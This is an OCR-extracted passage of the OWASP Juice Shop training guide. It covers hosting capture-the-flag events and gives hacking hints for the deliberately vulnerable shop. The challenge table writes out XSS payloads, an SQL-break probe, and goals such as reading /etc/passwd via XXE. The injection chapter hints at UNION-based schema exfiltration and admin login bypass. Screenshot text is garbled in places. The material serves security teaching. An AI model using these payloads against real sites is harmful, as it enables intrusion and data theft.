with your own application name. Best use application.name from your 
configuration. 

2. Create another replacement for a complete or partial Tweet or Facebook post 
with some marketing text and an actual coupon code. You can get valid 
coupon codes from the OWASP Juice Shop Twitter feed: 
https://twitter.com/owasp_juiceshop. 
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pa Word Replacer II 


New / Enable / Disable / Delete selected / Delete everything User manual / About WR II Changelog / Official community / Donate 


OWASP Juice Shop KN SwagLOG Replacement Setting 


1100 kilograms of bamboo per week | Enjoy a 50% discount code for our | 
Replacement type: Simple / I 
Letter case: Maintain / 
| Apply to selected 


Export / Import 


Export] [Import] 


























3. Enable the plugin and verify your replacements work: 


L @KNLogistics 


3 Enjoy a 50% discount code for our 
upcoming #KNSwagLOG application: 
n(XRvi4WOw dlvr.it/QXDss5 





23:00 - 13. Juni 2018 


6 Retweets 8 „Gefällt mir’-Angaben 9 } = + a oO D Ð O 


Q Q6 O 8 
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Anmeldung 


Weiter zu KN SwagLOG 


E-Mail oder Telefonnummer 


E-Mail-Adresse vergessen? 


Konto erstellen 
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Hosting a CTF event 


In computer security, Capture the Flag (CTF) is a computer security 
competition. CTF contests are usually designed to serve as an educational 
exercise to give participants experience in securing a machine, as well as 
conducting and reacting to the sort of attacks found in the real world. 
Reverse-engineering, network sniffing, protocol analysis, system 
administration, programming, and cryptanalysis are all skills which have 
been required by prior CTF contests at DEF CON. There are two main 
styles of capture the flag competitions: attack/defense and jeopardy. 


In an attack/defense style competition, each team is given a machine (or a 
small network) to defend on an isolated network. Teams are scored on both 
their success in defending their assigned machine and on their success in 
attacking the other team's machines. Depending on the nature of the 
particular CTF game, teams may either be attempting to take an 
opponent's flag from their machine or teams may be attempting to plant 
their own flag on their opponent's machine. Two of the more prominent 
attack/defense CTF's are held every year at DEF CON, the largest hacker 
conference, and the NYU-CSAW (Cyber Security Awareness Week), the 
largest student cyber-security contest. 


Jeopardy-style competitions usually involve multiple categories of 
problems, each of which contains a variety of questions of different point 
values and difficulties. Teams attempt to earn the most points in the 
competition's time frame (for example 24 hours), but do not directly attack 
each other. Rather than a race, this style of game play encourages taking 
time to approach challenges and prioritizes quantity of correct submissions 
over the timing." 
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OWASP Juice Shop can be run in a special configuration that allows to use it in 
Capture-the-flag (CTF) events. This can add some extra motivation and fun 
competition for the participants of a security training or workshop. 


Running Juice Shop in CTF-mode 


Juice Shop supports Jeopardy-style CTFs by generating a unique CTF flag code 
for each solved challenge. 


= JR OWASP Juice Shop 


You successfully solved a challenge: Error Handling (Provoke an error that is neither very 
gracefully nor consistently handled.) x 


E3 9c297196ecf8890bc1e900fcf3aebae8c9f9880a Copy to clipboard 





These codes are not displayed by default, but can be made visible by running the 
application with the config/ctf.ym1 configuration: 


set NODE_ENV=ctf # on Windows 
export NODE_ENV=ctf # on Linux 


npm start 


On Linux you can also pass the nope_env in directly in a single command 


NODE_ENV=ctf npm start 
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When running the application as a Docker container instead execute 


docker run -d -e "“NODE_ENV=ctf" -p 3000:3000 bkimminich/juice-shop 


The ctf.ym1 configuration furthermore hides the GitHub ribbon in the top right 
corner of the screen. It also hides all hints from the score board. Instead it will 
make the solved-labels on the score board clickable which results in the 
corresponding "challenge solved!"-notification being repeated. This can be useful 
in case you forgot to copy a flag code before closing the corresponding 
notification. 


Category Status 


Sensitive Data Exposure unsolved 


Click to repeat the notification containing the solution- 


XSS code for this challenge. 


Security Misconfiguration D solved 





Overriding the ctf.key 


Juice Shop uses the content of the provided ctf.key file as the secret component 
of the generated CTF flag codes. If you want to make sure that your flag codes 
are not the same for every hosted CTF event, you need to override that secret 
key. 


The simplest way to do so, is by providing an alternative secret key via the 
CTF_KEY environment variable: 


set CTF_KEY=XXXXXXXXXXXXXXX # on Windows 


export CTF_KEY=XXXXXXXXXXXXXXX # on Linux 


or when using Docker 


docker run -d -e "CTF_KEY=XXXXXXXXXXXXXXX" -e "NODE_ENV=ctf" -p 3000:3000 bkimminich/j 


4 > 


CTF event infrastructure 


The pivotal point of any Jeopardy-style CTF event is a central score-tracking 
server. It manages the status of the CTF, typically including 


e registration dialogs for teams and users 
e leader board of users/teams participating in the event 
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e challenge board with the open/solved hacking tasks and their score value 
e which challenges have been solved already and by whom 


Apart from the score-tracking server, each participant must have their own 
instance of OWASP Juice Shop. As explained in the Single-user restriction 
section, having a shared instance for each team is strongly discouraged, because 
Juice Shop is programmed as a single-user application. 


If you want to centrally host Juice Shop instances for any number of CTF 
participants you find more information in section Hosting individual instances for 
multiple users of the trainer's guide. 


It is absolutely important that all Juice Shop instances participating in a CTF use 
the same secret key to generate their CTF flag codes. The score server must be 
set up accordingly to accept exactly those flag codes for solving the hacking 
challenges and allocating their score to the first team/user that solved it. 


As long as the flag code key is identical for all of them, it does not matter which 
run option for the Juice Shop each participant uses: Local Node.js, Docker 
container or Heroku/Amazon EC2 instances all work fine as they are 
independently running anyway! There is no runtime dependency to the score 
server either, as participants simply enter the flag code they see upon solving a 
challenge manually somewhere on the score server's user interface, typically via 
their browser: 








Setting up CTF score servers for Juice 
Shop 


Juice Shop comes with the convenient juice-shop-ctf-cli tool to to simplify the 
hosting of CTFs using popular open source frameworks or game servers. This 
can significantly speed up your setup time for an event, because things like using 
the same secret key for the flag codes are taken care of mostly automatic. 
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Generating challenge import files with juice-shop- 
ctf-cli 


The juice-shop-ctf-cli is a simple command line tool, which will generate a file 
compatible with your chosen CTF framework's data backup format. This can be 
imported to populate its database and generate mirror images of all current Juice 
Shop challenges on the score server. The following instructions were written for 


v6.1.1 of juice-shop-ctf-cli. 
To install juice-shop-ctf-cli you need to have Node.js 8.x or higher installed. 


Simply execute 


npm install -g juice-shop-ctf-cli 


and then run the tool with 


juice-shop-ctf 


The tool will now ask a series of questions. All questions have default answers 
available which you can choose by simply hitting ENTER . 


Gen for setting up CTFd 1.x, CTFd 2.x or FBCTF score server 
CTF fr work to generate data 
Juice Shop Ul to retrieve challenges? 
Secret ke > URL to file? 


th each challenge? 


the ZIP-archive into CIFd 2.x, please 


ng-owasp-juice-shop/content/part1/ctf .html#running-ctfd 





1. CTF framework to generate data for? Offers a selectable choice between 
the supported CTF frameworks, which for v6.1.1 are 
o cTFd 2.x which is a very well-written and stable piece of Open Source 
Software. This is the default choice. 
o cTFd 1.x requiring a slightly different data format than the newer 2.x 
version. 
o FBcTF from Facebook which is visually more advanced though not as 
frequently updated at CTFd. 
2. Juice Shop URL to retrieve challenges? URL of a running Juice Shop 
server where the tool will retrieve the existing challenges from via the 
/api/Challenges API. Defaults to https://juice-shop.herokuapp.com Which 
always hosts the latest official released version of OWASP Juice Shop. 
3. Secret key URL to ctf.key file? Either a secret key to use for the CTF flag 
codes ora URL to a file containing such a key. Defaults to 
https://raw.githubusercontent.com/bkimminich/juice-shop/master/ctf.key which is 
the key file provided with the latest official OWASP Juice Shop release. See 
Overriding the ctf.key for more information. 
4. URL to country-mapping.yml file? URL of a mapping configuration of 
challenges to countries, which is only asked when rsctr was selected. 
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Defaults to https: //raw.githubusercontent .com/bkimminich/juice- 
shop/master/config/fbctf.yml 
5. Insert a text hint along with each challenge? Offers a selectable choice 
between 
© No text hints will not add any hint texts to the challenges. This is the 
default choice. 
© Free text hints Will add the challenge.hint property from the Juice Shop 
database as hint to the corresponding challenge on the CTF score 
server. Viewing this hint is free. 
© Paid text hints adds a hint per challenge like described above. Viewing 
this hint costs the team 10% of that challenge's score value. 
6. Insert a hint URL along with each challenge? Offers a selectable choice 
between 
© No hint uRLs will not add any hint URLs to the challenges. This is the 
default choice. 
© Free hint URLs Will add the challenge.hinturl property from the Juice 
Shop database as a hint to the corresponding challenge on the CTF 
score server. Viewing this hint is free. 
o Paid hint URLs adds a hint per challenge like described above. Viewing 
this hint costs the team 20% of that challenge's score value. 


The category of each challenge is identical to its category in the Juice Shop 
database. The score value and optional costs for hints of each challenge are 
calculated by the juice-shop-ctf-cli program as follows: 


Difficulty Score value Paid hint costs (Text / URL) 
* 100 points (10 points / 20 points) 

tok 250 points (25 points / 50 points) 

tik 450 points (45 points / 90 points) 

tot tk 700 points (70 points / 140 points) 

tot kk 1000 points (100 points / 200 points) 
toto tk tok 1350 points (135 points / 260 points) 


The generated output of the tool will finally be written into in the folder the 
program was started in. By default the output files are named 
OWASP_Juice_Shop.YYYY-MM-DD.CTFd2.zip , OWASP_Juice_Shop.YYYY-MM-DD.CTFd.zip Or 


OWASP_Juice_Shop.YYYY-MM-DD.FBCTF.json depending on your initial framework choice. 


Optionally you can choose the name of the output file with the --output 
parameter on startup: 


juice-shop-ctf --output challenges.out 


Non-interactive generator mode 


Instead of answering questions in the CLI you can also provide your desired 
configuration in a file with the following straightforward format: 
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ctfFramework: CTFd 2.x | CTFd 1.x | FBCTF 

juiceShopUrl: https://juice-shop.herokuapp.com 

ctfkey: https://raw.githubusercontent.com/bkimminich/juice-shop/master/ctf.key # can < 
countryMapping: https://raw.githubusercontent.com/bkimminich/juice-shop/master/config/ 
insertHints: none | free | paid 

insertHintUrls: none | free | paid # optional for FBCTF 


You can then pass this YAML file into the CLI the generator with the --config 
parameter: 


juice-shop-ctf --config myconfig.yml 


As in interactive mode, you can also choose the name of the output file with the - 
-output parameter: 


juice-shop-ctf --config myconfig.yml --output challenges.out 


Running CTFd 


Cl re 


This setup guide assumes that you use CTFd 2.x, 1.1.x or 1.2.x. To apply the 
generated .zip , follow the steps describing your preferred CTFd run-mode 
below. 


Local server setup 


. Get CTFd with git clone https://github.com/CTFd/CTFd.git . 

. Run git checkout tags/<version> to retrieve version 2.x, 1.1.x or 1.2.x. 

. Perform steps 1 and 3 from the CTFd installation instructions. 

. Browse to your CTFd instance UI (by default http://127.0.0.1:4000) and 
create an admin user and CTF name. 


WN = 


oa 


. Go to the section Admin > Config > Backup and choose Import 

6. Select the generated .zip file and make sure only the Challenges box is 
ticket. Press Import. 

7. (Only for CTFd 2.0.x) Dismiss any occurring Internal Server Error alert 
popup after import and restart your CTFd server. 

8. (Only for CTFd 2.x) Repeat the initial admin and CTF setup from step 4. to 

regain access to the CTF game. It is now pre-populated with the Juice Shop 

challenges. 


Docker container setup 
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1. Setup Docker host and Docker compose. 

2. Follow all steps from the CTFd Docker setup to install Docker, download the 
source code, create containers (for 2.x, 1.1.x or 1.2.x) and start them. 

3. After running docker-compose up from previous step, you should be able to 
browse to your CTFd instance UI ( <<docker host IP>>:8000 by default) and 
create an admin user and CTF name. 

4. Follow the steps 5-8 from the Local server setup described above. 


Non-production Docker image 


1. Install Docker 

2. Run docker pull ctfd/ctfd:<version> the retrieve tag 2.x, 1.1.x or 1.2.x 

3. Execute docker run --rm -p 8000:8000 ctfd/ctfd:<version> to run 2.x, 1.1.x or 
1.2.x 

4. Follow the steps 5-8 from the Local server setup described above 


Once you have CTFd up and running, you should see all the created data in the 


Challenges tab: 


Challenge 13 Solves 


Access the administration section of the store. (Difficulty Level: 1) 


View Hint 


Unlock Hint for 20 points 


“9 


You already solved this 
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German OWASP Day JS Workshop 





Top 10 Teams 








12k 
10k 
8k 
6k 
4k 
2k 
0 
13:30 14:00 14:30 15:00 15:30 16:00 16:30 17:00 17:30 
Nov 19, 2018 
— leo —*—seekuh —e—DM — kM — FH —* Lufthansa —e— ATeam —e— Siggi —*— Tobias 
—— icke 
Place Team Score 
1 leo 11700 
2 seekuh 10550 
3 DM 6700 
4 KM 6100 
5 FH 6000 
6 Lufthansa 5950 
7 ATeam 5550 
TFd 





Statistics 


14 teams registered 
5 IP addresses Solve Counts 


73 challenges 





Admin Section has the most solves with 8 1 
12 solves 3 
Steganography Tier 1 has the least 5 
solves with a $ 
1 solves £ 22222 


1111111111111 
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Solve Percentages per Challenge 


%) 


Percentage of Teams ( 
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German OWASP Day JS Workshop 





Key Percentages Category Breakdown 





W Solves W Fails 


Score over Time 


200 


17:56 17:58 17:59 18:00 18:01 
Nov 19, 2018 


Running FBCTF 


Bal % 


CAPTURE THE FLAG 





Please note that Facebook does not publish any versioned releases of FBCTF. 
They recommend to use the master -branch content from GitHub 
(https://github.com/facebook/foctf) in all their setup methods. There is also no 
official image on Docker Hub for FBCTF. 
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1. Follow any of the options described in the FBCTF Quick Setup Guide. 
2. Browse to your FBCTF instance UI. 

3. Click the Controls tab under the Game Admin panel. 

4. Choose Import Full Game and select the generate .json file. 


The following screenshots were taken during a CTF event where Facebook's 
game server was used. Juice Shop instances were running in a Docker cluster 
and individually assigned to a participant via a load balancer. 


= LEADERBOARD 


Canada - Score 
Board 


100) ' 


= LEADERBOARD 


HAGKBROTTCHEN 


ANNOUNCEMENTS: rer 


IS 


a activity 


capture_Russia - Login Admin 


SUBMIT 
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scoreboard_ 
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Using other CTF frameworks 


CTFd and FBCTF are not the only possible score servers you can use. Open 
Source alternatives are for example Mellivora or NightShade. You can find a 
nicely curated list of CTF platforms and related tools & resources in Awesome 
CTF on GitHub. 


All these platforms have one thing in common: Unless you write a dedicated 
lib/generators/ -file ©, you have to set up the challenges inside them manually 
on your own. Of course you can choose aspects like score per challenge, 
description etc. like you want. For the CTF to actually work there is only one 
mandatory prerequisite: 


The flag code for each challenge must be declared as the result of 


HMAC_SHA1(ctfKey, challenge.name) 


with challenge.name being the name column of the challenges table in the Juice 
Shop's underlying database. The ctfkey has been described in the Overriding 
the ctf.key section above. 


Feel free to use the implementation within juice-shop-ctf-cli aS an example: 


var jsSHA = require('jssha') 


function hmacShal (secretKey, text) { 
var shaObj = new jsSHA('SHA-1', 'TEXT') 
shaObj.setHMACKey(secretKey, 'TEXT') 
shaObj.update(text) 
return shaObj.getHMAC('HEX') 
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In cryptography, a keyed-hash message authentication code (HMAC) is a 
specific type of message authentication code (MAC) involving a 
cryptographic hash function and a secret cryptographic key. It may be used 
to simultaneously verify both the data integrity and the authentication of a 
message, as with any MAC. Any cryptographic hash function, such as MD5 
or SHA-1, may be used in the calculation of an HMAC; the resulting MAC 
algorithm is termed HMAC-MD5 or HMAC-SHA1 accordingly. The 
cryptographic strength of the HMAC depends upon the cryptographic 
strength of the underlying hash function, the size of its hash output, and on 
the size and quality of the key. 


An iterative hash function breaks up a message into blocks of a fixed size 
and iterates over them with a compression function. For example, MD5 and 
SHA-1 operate on 512-bit blocks. The size of the output of HMAC is the 
same as that of the underlying hash function (128 or 160 bits in the case of 
MD5 or SHA-1, respectively), although it can be truncated if desired. 


HMAC does not encrypt the message. Instead, the message (encrypted or 
not) must be sent alongside the HMAC hash. Parties with the secret key 
will hash the message again themselves, and if it is authentic, the received 
and computed hashes will match. 


Commercial use disclaimer 


Bear in mind: With the increasing number of challenge solutions (this book 
included) available on the Internet it might not be wise to host a professional CTF 
for prize money with OWASP Juice Shop! 


: . https://en.wikipedia.org/wiki/Capture_the_flag#Computer_security © 


2 https://en.wikipedia.org/wiki/Hash-based_message_authentication_code 


e 
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Part Il - Challenge hunting 


This part of the book can be read from end to end as a hacking guide. Used in 
that way you will be walked through various types of web vulnerabilities and learn 
how to exploit their occurrences in the Juice Shop application. Alternatively you 
can start hacking the Juice Shop on your own and use this part simply as a 
reference and source of hints in case you get stuck at a particular challenge. 


In case you want to look up hints for a particular challenge, the following tables 
lists all challenges of the OWASP Juice Shop grouped by their difficulty and in the 
same order as thery appear on the Score Board. 


The challenge hints found in this release of the companion guide are compatible 
with v9.1.0 of OWASP Juice Shop. 
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Name 


API-only XSS 


Access Log 


Admin 
Registration 


Admin Section 


Arbitrary File 
Write 


Bjoern's 
Favorite Pet 


Blockchain 
Hype 


Blocked RCE 
DoS 


CAPTCHA 
Bypass 


Change 
Bender's 
Password 


Christmas 
Special 


Classic Stored 
XSS 


Client-side 
XSS Protection 


Confidential 
Document 


DOM XSS 


Database 
Schema 


Description 


Perform a persisted XSS 
attack with <iframe 
src="javascript:alert(°xss°)"> 
without using the frontend 
application at all. 


Gain access to any access log 
file of the server. 


Register as a user with 
administrator privileges. 


Access the administration 
section of the store. 


Overwrite the Legal 
Information file. 


Reset the password of Bjoern's 
OWASP account via the 
Forgot Password mechanism 
with the truthful answer to his 
security question. 


Learn about the Token Sale 
before its official 
announcement. 


Perform a Remote Code 
Execution that would keep a 
less hardened application busy 
forever. 


Submit 10 or more customer 
feedbacks within 10 seconds. 


Change Bender's password 
into slurmCl4ssic without using 
SQL Injection or Forgot 
Password. 


Order the Christmas special 
offer of 2014. 


Perform an XSS attack with 
<script>alert( > xss° )</script> 
on a legacy page within the 
application. 


Perform a persisted XSS 
attack with <iframe 
src="javascript:alert( > xss° )"> 
bypassing a client-side 
security mechanism. 


Access a confidential 
document. 


Perform a DOM XSS attack 
with <iframe 
src="javascript:alert(>xss°)">. 


Exfiltrate the entire DB schema 
definition via SQL Injection. 


77 


Hints 


Solution 











Name 


Deprecated 
Interface 


Easter Egg 


Email Leak 


Ephemeral 
Accountant 


Error Handling 


Expired 
Coupon 


Extra 
Language 


Five-Star 
Feedback 


Forged 
Coupon 


Forged 
Feedback 


Forged Review 


Forged Signed 
JWT 


Forgotten 
Developer 
Backup 


Forgotten 
Sales Backup 


Frontend 
Typosquatting 


GDPR Data 
Erasure 


GDPR Data 
Theft 


Description 


Use a deprecated B2B 
interface that was not properly 
shut down. 


Find the hidden easter egg. 


Perform an unwanted 
information disclosure by 
accessing data cross-domain. 


Log in with the (non-existing) 
accountant accOunt4nt@juice- 
sh.op without ever registering 
that user. 


Provoke an error that is neither 
very gracefully nor consistently 
handled. 


Successfully redeem an 
expired campaign coupon 
code. 


Retrieve the language file that 
never made it into production. 


Get rid of all 5-star customer 
feedback. 


Forge a coupon code that 
gives you a discount of at least 
80%. 


Post some feedback in another 
users name. 


Post a product review as 
another user or edit any user's 
existing review. 


Forge an almost properly RSA- 
signed JWT token that 
impersonates the (non- 
existing) user rsa_lord@juice- 
sh.op. 


Access a developer's forgotten 
backup file. 


Access a salesman's forgotten 
backup file. 


Inform the shop about a 
typosquatting imposter that 
dug itself deep into the 
frontend. (Mention the exact 
name of the culprit) 


Log in with Chris' erased user 
account. 


Steal someone else's personal 
data without using Injection. 
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Hints 


Solution 














Name 


HTTP-Header 
XSS 


Imaginary 
Challenge 


Leaked Access 
Logs 


Leaked Unsafe 
Product 


Legacy 
Typosquatting 


Login Admin 


Login Amy 


Login Bender 


Login Bjoern 


Login CISO 


Login Jim 


Login MC 
SafeSearch 


Login Support 
Team 


Description 


Perform a persisted XSS 


attack with <iframe 
src="javascript:alert(°xss°)"> 


through an HTTP header. 


Solve challenge #999. 
Unfortunately, this challenge 
does not exist. 


Dumpster dive the Internet for 
a leaked password and log in 
to the original user account it 
belongs to. (Creating a new 
account with the same 
password does not qualify asa 
solution.) 


Identify an unsafe product that 
was removed from the shop 
and inform the shop which 
ingredients are dangerous. 


Inform the shop about a 
typosquatting trick it has been 
a victim of at least in v6.2.0- 
SNAPSHOT. (Mention the 
exact name of the culprit) 


Log in with the administrator's 
user account. 


Log in with Amy's original user 
credentials. (This could take 
93.83 billion trillion trillion 
centuries to brute force, but 
luckily she did not read the 
"One Important Final Note") 


Log in with Bender's user 
account. 


Log in with Bjoern's Gmail 
account without previously 
changing his password, 
applying SQL Injection, or 
hacking his Google account. 


Exploit OAuth 2.0 to log in with 
the Chief Information Security 
Officer's user account. 


Log in with Jim's user account. 


Log in with MC SafeSearch's 
original user credentials 
without applying SQL Injection 
or any other bypass. 


Log in with the support team's 
original user credentials 
without applying SQL Injection 
or any other bypass. 
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Hints 


Solution 





Name 


Manipulate 
Basket 


Misplaced 
Signature File 


Multiple Likes 


Nested Easter 
Egg 


NoSQL DoS 
NoSQL 
Exfiltration 
NoSQL 


Manipulation 


Outdated 
Whitelist 


Password 
Strength 


Payback Time 


Premium 
Paywall 


Privacy Policy 


Privacy Policy 
Inspection 


Product 
Tampering 


Reflected XSS 


Repetitive 
Registration 


Reset Bender's 
Password 


Description 


Put an additional product into 
another user's shopping 
basket. 


Access a misplaced SIEM 
signature file. 


Like any review at least three 
times as the same user. 


Apply some advanced 
cryptanalysis to find the real 
easter egg. 


Let the server sleep for some 
time. (It has done more than 
enough hard work for you) 


All your orders are belong to 
us! Even the ones which don't! 


Update multiple product 
reviews at the same time. 


Let us redirect you to one of 
our crypto currency addresses 
which are not promoted any 
longer. 


Log in with the administrator's 
user credentials without 
previously changing them or 
applying SQL Injection. 


Place an order that makes you 
rich. 


Unlock Premium Challenge to 
access exclusive content. 


Read our privacy policy. 


Prove that you actually read 
our privacy policy. 


Change the href of the link 
within the OWASP SSL 
Advanced Forensic Tool (O- 
Saft) product description into 
https://owasp.slack.com. 


Perform a reflected XSS attack 
with <iframe 


src="javascript:alert(>xss°)">. 


Follow the DRY principle while 
registering a user. 


Reset Bender's password via 
the Forgot Password 
mechanism with the truthful 
answer to his security 
question. 


80 


Hints 


Solution 


|_| 














Name 


Reset Bjoern's 
Password 


Reset Jim's 
Password 


Reset Morty's 
Password 


Retrieve 
Blueprint 


SSRF 


SSTi 


Score Board 


Security Policy 


Server-side 
XSS Protection 


Steganography 


Successful 
RCE DoS 


Supply Chain 
Attack 


Two Factor 
Authentication 


Description 


Reset the password of Bjoern's 
internal account via the Forgot 
Password mechanism with the 
truthful answer to his security 
question. 


Reset Jim's password via the 
Forgot Password mechanism 
with the truthful answer to his 
security question. 


Reset Morty's password via 
the Forgot Password 
mechanism with his 
obfuscated answer to his 
security question. 


Deprive the shop of earnings 
by downloading the blueprint 
for one of its products 


Request a hidden resource on 
server through server. 


Infect the server with juicy 
malware by abusing arbitrary 
command execution. 


Find the carefully hidden 
‘Score Board' page. 


Behave like any "white hat" 
should before getting into the 
action. 


Perform a persisted XSS 
attack with <iframe 
src="javascript:alert(°xss°)"> 
bypassing a server-side 
security mechanism. 


Rat out a notorious character 
hiding in plain sight in the 
shop. (Mention the exact name 
of the character) 


Perform a Remote Code 
Execution that occupies the 
server for a while without using 
infinite loops. 


Inform the development team 
about a danger to some of 
their credentials. (Send them 
the URL of the original report 
or the CVE of this vulnerability) 


Solve the 2FA challenge for 
user "wurstbrot". (Disabling, 
bypassing or overwriting his 
2FA settings does not count as 
a solution) 
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Hints 


Solution 








Name Description Hints Solution 
Forge an essentially unsigned 
Unsigned JWT JWT token that impersonates e B 
the (non-existing) user : 
jwtn3d@juice-sh.op. 
Upload Size ee a file larger than 100 e E 
Upload a file that has no .pdf 
Upload Type or .zip extension. ? E 
User Retrieve a list of all user e B 
Credentials credentials via SQL Injection s 
Embed an XSS payload 
Video XSS </script><script>»alert(`xss`) d L 
</script> into our promo video. 
View Basket View another user's shopping e E 
basket. z 
Inform the shop about a 
vulnerable library it is using. 
nerapig (Mention the exact library ? O 
Library a s 
name and version in your 
comment) 
Inform the shop about an 
algorithm or library it should 
ere Erypio definitely not use the way it ? m 
does. 
T Enforce a redirect to a page 
Whitelist you are not supposed to d im) 
Bypass : F 
redirect to. 
XXE Data Retrieve the content of 
Access C:\Windows\system.ini Or @ L 
/etc/passwd from the server. 
XXE DoS Give the server something to e E 
chew on for quite a while. : 
Zero Stars Give a devastating zero-star e B 


feedback to the store. 





Challenge Solutions 


In case you are getting frustrated with a particular challenge, you can refer to the 
Challenge solutions appendix where you find explicit instructions how to 
successfully exploit each vulnerability. It is highly recommended to use this option 
only as a last resort. You will learn a lot more from hacking entirely on your own 
or relying only on the hints in this part of the book. 
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Finding the Score Board 


In part 1 you were introduced to the Score Board and learned how it tracks your 
challenge hacking progress. You also had a "happy path" tour through the Juice 
Shop application from the perspective of a regular customer without malicious 
intentions. But you never saw the Score Board, did you? 


Challenges covered in this chapter 


Name Description Difficulty 
Score Find the carefully hidden 'Score Board’ re 
Board page. 


Find the carefully hidden 'Score Board" page 


Why was the Score Board not visited during the "happy path" tour? Because there 
seemed to be no link anywhere in the application that would lead you there! You 
know that it must exist, which leaves two possible explanations: 


1. You missed the link during the initial mapping of the application 
2. There is a URL that leads to the Score Board but it is not hyperlinked to 


3. Knowing it exists, you can simply guess what URL the Score Board might 
have. 


4. Alternatively, you can try to find a reference or clue within the parts of the 
application that are not usually visible in the browser 
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Injection 


Injection flaws allow attackers to relay malicious code through an 
application to another system. These attacks include calls to the operating 
system via system calls, the use of external programs via shell commands, 
as well as calls to backend databases via SQL (i.e., SQL injection). Whole 
scripts written in Perl, Python, and other languages can be injected into 
poorly designed applications and executed. Any time an application uses 
an interpreter of any type there is a danger of introducing an injection 
vulnerability. 


Many web applications use operating system features and external 
programs to perform their functions. Sendmail is probably the most 
frequently invoked external program, but many other programs are used as 
well. When a web application passes information from an HTTP request 
through as part of an external request, it must be carefully scrubbed. 
Otherwise, the attacker can inject special (meta) characters, malicious 
commands, or command modifiers into the information and the web 
application will blindly pass these on to the external system for execution. 


SQL injection is a particularly widespread and dangerous form of injection. 
To exploit a SQL injection flaw, the attacker must find a parameter that the 
web application passes through to a database. By carefully embedding 
malicious SQL commands into the content of the parameter, the attacker 
can trick the web application into forwarding a malicious query to the 
database. These attacks are not difficult to attempt and more tools are 
emerging that scan for these flaws. The consequences are particularly 
damaging, as an attacker can obtain, corrupt, or destroy database 
contents. 


Injection vulnerabilities can be very easy to discover and exploit, but they 
can also be extremely obscure. The consequences of a successful injection 
attack can also run the entire range of severity, from trivial to complete 
system compromise or destruction. In any case, the use of external calls is 
quite widespread, so the likelihood of an application having an injection flaw 
should be considered high. 1 


Challenges covered in this chapter 
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Name Description Difficulty 

Christmas Order the Christmas special offer of var 

Special 2014. 

Database Exfiltrate the entire DB schema definition rere 

Schema via SQL Injection. 

Ephemeral Log in with the (non-existing) accountant 

p accOunt4nt@juice-sh.op without ever KAAK 

Accountant BASRE 

registering that user. 
s ; Log in with the administrator's user 

Login Admin PAREA kk 

Login EARS 

Bender Log in with Bender's user account. kA 

Login Jim Log in with Jim's user account. XAK 
Let the server sleep for some time. (It 

NoSQL DoS has done more than enough hard work XAK 
for you) 

NoSQL All your orders are belong to us! Even the 

Exfiltration ones which don't! latalata 

NoSQL Update multiple product reviews at the 

Manipulation same time. Kk tok 

; Infect the server with juicy malware by 

Son abusing arbitrary command execution. atatatatitii 

User Retrieve a list of all user credentials via 

Credentials SQL Injection. Aok 


© Please note that some NoSQL Injection challenges described below are not 
available when running the Juice Shop in either a Docker container or on a 
Heroku dyno! The used query syntax allows any sufficiently skilled attacker to 
execute arbitrary code including to terminate the application process. 


Reconnaissance advice 


Instead of trying random attacks or go through an attack pattern list, it is a good 
idea to find out if and where a vulnerability exists, first. By injecting a payload that 
should typically break an underlying SQL query (e.g. ' or '; ) you can analyze 
how the behaviour differs from regular use. Maybe you can even provoke an error 
where the application leaks details about the query structure and schema details 


like table or column names. Do not miss this opportunity. 


Order the Christmas special offer of 2014 
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Blind SQL (Structured Query Language) injection is a type of SQL Injection 
attack that asks the database true or false questions and determines the 
answer based on the applications response. This attack is often used when 
the web application is configured to show generic error messages, but has 
not mitigated the code that is vulnerable to SQL injection. 


When an attacker exploits SQL injection, sometimes the web application 
displays error messages from the database complaining that the SQL 
Query's syntax is incorrect. Blind SQL injection is nearly identical to normal 
SQL Injection, the only difference being the way the data is retrieved from 
the database. When the database does not output data to the web page, an 
attacker is forced to steal data by asking the database a series of true or 
false questions. This makes exploiting the SQL Injection vulnerability more 
difficult, but not impossible.4 


To solve this challenge you need fo order a product that is not supposed to be 
available any more. 


e Find out how the application hides deleted products from its customers. 

e Try to craft an attack string that makes deleted products visible again. 

e You need to get the deleted product into your shopping cart and trigger the 
Checkout. 

e Neither of the above can be achieved through the application frontend and it 
might even require (half-)Blind SQL Injection. 


Exfiltrate the entire DB schema definition via SQL 
Injection 


An attacker would try to exploit SQL Injection to find out as much as possible 
about your database schema. This subsequently allows much more targeted, 
stealthy and devastating SQL Injections, like Retrieve a list of all user credentials 
via SQL Injection. 


e Find out which database system is in use and where it would usually store its 
schema definitions. 

e Craft a unton seLecT attack string to join the relevant data from any such 
identified system table into the original result. 

e You might have to tackle some query syntax issues step-by-step, basically 
hopping from one error to the next 

e As with Order the Christmas special offer of 2014 this cannot be achieved 
through the application frontend. 


Log in with the (non-existing) accountant without 
ever registering that user 


In ths challenge you need to log in with a user that has accountant-level 
permissions, but does not really exist. 


e The user literally needs to be ephemeral as in “lasting for only a short time". 
e Registering normally with the user's email address will then obviously not 
solve this challenge. The Juice Shop will not even let you register as 
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acc@unt4nt@juice-sh.op , aS this would make the challenge unsolvable for you. 
e Getting the user into the database some other way will also fail to solve this 
challenge. In case you somehow managed to do so, you need to restart the 
Juice Shop application in order to wipe the database and make the challenge 
solvable again. 
e The fact that this challenge is in the Injection category should already give 
away the intended approach. 


User Registration 


Nice try, but this is not how the "Ephemeral Accountant” challenge works! 


Email 


accOunt4nt@juice-sh.op 


O Password must be 5-20 characters long 
Repeat Password 


Security Question 

Mother's maiden name? 
© This cannot be changed later! 
Answer 


4 


+ Register 





Log in with the administrator's user account 


What would a vulnerable web application be without an administrator user 
account whose (supposedly) privileged access rights a successful hacker can 
abuse? 


e The challenge description probably gave away what form you should attack. 

e |f you happen to know the email address of the admin already, you can 
launch a targeted attack. 

e You might be lucky with a dedicated attack pattern even if you have no clue 
about the admin email address. 

e If you harvested the admin's password hash, you can of course try to attack 
that instead of using SQL Injection. 
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e Alternatively you can solve this challenge as a combo with the Log in with the 
administrator's user credentials without previously changing them or applying 
SQL Injection challenge. 


Log in with Bender's user account 


Bender is a regular customer, but mostly hangs out in the Juice Shop to troll it for 
its lack of alcoholic beverages. 


e The challenge description probably gave away what form you should attack. 

e You need to know (or smart-guess) Bender's email address so you can 
launch a targeted attack. 

e In case you try some other approach than SQL Injection, you will notice that 
Bender's password hash is not very useful. 


Log in with Jim's user account 


Jim is a regular customer. He prefers juice from fruits that no man has ever tasted 
before. 


e The challenge description probably gave away what form you should attack. 

e You need to know (or smart-guess) Jim's email address so you can launch a 
targeted attack. 

e |f you harvested Jim's password hash, you can try to attack that instead of 
using SQL Injection. 


Let the server sleep for some time 
